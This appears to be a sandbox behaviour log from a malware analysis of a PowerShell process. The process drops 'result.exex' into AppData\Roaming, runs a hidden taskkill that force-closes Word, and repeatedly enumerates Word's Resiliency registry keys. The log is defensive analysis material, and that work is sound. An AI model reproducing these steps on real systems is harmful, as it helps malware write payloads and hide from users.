| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
21 | |
| Environment | Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\result.exex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\result.exex, type = file_type |
|
2 | |
| Environment | Get Environment String | name = TEMP, result_out = C:\Users\aETAdzjz\AppData\Local\Temp |
|
2 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\taskkill.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Process | Create | process_name = "C:\Windows\system32\taskkill.exe" /f /im winword.exe, os_pid = 0x5f4, show_window = SW_HIDE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
